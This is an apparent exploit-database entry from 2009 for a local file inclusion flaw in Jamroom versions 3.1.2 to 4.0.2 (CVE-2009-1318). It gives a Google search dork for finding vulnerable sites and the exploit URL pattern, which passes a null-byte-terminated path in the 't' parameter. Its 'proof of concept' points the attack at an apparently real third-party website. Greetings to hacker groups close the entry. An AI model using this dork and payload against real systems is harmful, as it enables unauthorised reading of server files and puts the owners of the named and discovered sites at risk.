Jamroom 4.0.2 - 't' Local File Inclusion

Author: zxvf
type: webapps
platform: php
port: 
date_added: 2009-04-13 
date_updated: 2016-12-08 
verified: 1 
codes: OSVDB-53784;CVE-2009-1318 
tags: 
aliases:  
screenshot_url:  
application_url:

[o]-----------------------------------------------------------------------------------------------------------------[x]
 |  Local File Include Vulnerability                                                    |
[o]------------------------------------------------------------------------------------[o]
 |  Software : Jamroom version 3.1.2 , 3.2.3 , 3.2.4 , 3.2.5 , 3.2.6 , 4.0.2            |
 |  Vendor   : www.jamroom.net                                                          |
 |  Date     : 12 March 2009                                                            |
 |  Author   : zxvf                                                                     |
 |  Contact  : yuvant2blue@yahoo.co.id                                                   |
[o]------------------------------------------------------------------------------------[o]

[Â»] Google Dork

    "Powered by Jamroom"

[Â»] Exploit

    http://[site]/index.php?t=[LFI]%00

[Â»] Proof of Concept

    http://www.earplugradio.com//index.php?t=[LFI]%00

[o]------------------------------------------------------------------------------------[x]
 |  Greetz                                                                              |
[o]------------------------------------------------------------------------------------[o]
 |  c0li, OoN_Boy, pizzyroot, H312Y, eminem, xx_user, NoGe                              |
 |  Armageddon Team, avatar team, and all indonesian hacker!                            |
 |  BeHave oR BeGone !!!                                                                |
[o]------------------------------------------------------------------------------------[o]

# milw0rm.com [2009-04-14]